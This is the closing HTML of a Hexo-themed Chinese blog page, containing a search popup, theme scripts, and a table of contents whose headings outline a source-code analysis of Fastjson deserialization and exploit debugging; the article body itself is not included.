          <span class="search-input-field-pre">
            <i class="fas fa-keyboard"></i>
          </span>
            <div class="search-input-container">
                <input autocomplete="off"
                       autocorrect="off"
                       autocapitalize="off"
                       placeholder="搜索..."
                       spellcheck="false"
                       type="search"
                       class="search-input"
                >
            </div>
            <span class="close-popup-btn">
                <i class="fas fa-times"></i>
            </span>
        </div>
        <div id="search-result">
            <div id="no-result">
                <i class="fas fa-spinner fa-pulse fa-5x fa-fw"></i>
            </div>
        </div>
    </div>
</div>

    

    <!-- tablet toc -->
    
        <div class="tablet-post-toc-mask">
            <div class="tablet-post-toc">
                <div class="post-toc-wrap">
    <div class="post-toc">
        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#Java-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96-Fastjson-%E7%AF%87-05-%E5%86%99%E7%BB%99%E8%87%AA%E5%B7%B1%E7%9C%8B%E7%9A%84%E4%B8%80%E4%BA%9B%E6%BA%90%E7%A0%81%E6%B7%B1%E5%85%A5%E5%88%86%E6%9E%90"><span class="nav-text">Java 反序列化 Fastjson 篇 05-写给自己看的一些源码深入分析</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#0x01-%E5%89%8D%E8%A8%80"><span class="nav-text">0x01 前言</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x02-Fastjson-%E5%8E%9F%E7%90%86%E6%B5%85%E6%9E%90"><span class="nav-text">0x02 Fastjson 原理浅析</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#parse-%E6%96%B9%E6%B3%95%E8%A7%A3%E6%9E%90"><span class="nav-text">parse 方法解析</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#parseObject-%E6%96%B9%E6%B3%95%E8%A7%A3%E6%9E%90"><span class="nav-text">parseObject 方法解析</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E4%B8%BA%E4%BB%80%E4%B9%88-Fastjson-%E5%9C%A8%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E7%9A%84%E6%97%B6%E5%80%99%E4%BC%9A%E8%87%AA%E5%8A%A8%E8%B0%83%E7%94%A8-getter-x2F-setter"><span class="nav-text">为什么 Fastjson 在反序列化的时候会自动调用 getter&#x2F;setter</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#JavaBeanInfo-build"><span class="nav-text">JavaBeanInfo#build</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x03-Fastjson-%E5%85%B6%E4%BB%96%E7%82%B9%E8%A7%A3%E6%9E%90-%E6%8C%81%E7%BB%AD%E8%A1%A5%E5%85%85"><span class="nav-text">0x03 Fastjson 其他点解析(持续补充)</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%85%B3%E4%BA%8E-Feature-SupportNonPublicField"><span class="nav-text">关于 Feature.SupportNonPublicField</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%85%B3%E4%BA%8E-checkAutoType"><span class="nav-text">关于 checkAutoType</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x04-Fastjson-%E5%A4%9A-type-%E7%9A%84%E9%80%9A%E6%9D%80%E5%9E%8B-EXP-%E8%B0%83%E8%AF%95"><span class="nav-text">0x04 Fastjson 多 @type 的通杀型 EXP 调试</span></a></li></ol></li></ol>
    </div>
</div>

            </div>
        </div>
    
</main>



<script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.7.3/source/js/utils.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.7.3/source/js/main.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.7.3/source/js/header-shrink.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.7.3/source/js/back2top.js"></script><script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.7.3/source/js/dark-light-toggle.js"></script>




    <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.7.3/source/js/local-search.js"></script>



    <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.7.3/source/js/code-block.js"></script>




<div class="post-scripts pjax">
    
        <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.7.3/source/js/post-helper.js"></script>
        
            <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.7.3/source/js/libs/anime.min.js"></script>
        
        
            <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.7.3/source/js/toc.js"></script>
        
    
    
    
</div>


    <script src="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.7.3/source/js/libs/pjax.min.js"></script>
<script>
    window.addEventListener('DOMContentLoaded', () => {
        window.pjax = new Pjax({
            selectors: [
                'head title',
                '.page-container',
                '.pjax'
            ],
            history: true,
            debug: false,
            cacheBust: false,
            timeout: 0,
            analytics: false,
            currentUrlFullReload: false,
            scrollRestoration: false,
            // scrollTo: true,
        });

        document.addEventListener('pjax:send', () => {
            KEEP.utils.pjaxProgressBarStart();
        });

        document.addEventListener('pjax:complete', () => {
            KEEP.utils.pjaxProgressBarEnd();
            window.pjax.executeScripts(document.querySelectorAll('script[data-pjax], .pjax script'));
            KEEP.refresh();
        });
    });
</script>




</body>
</html>
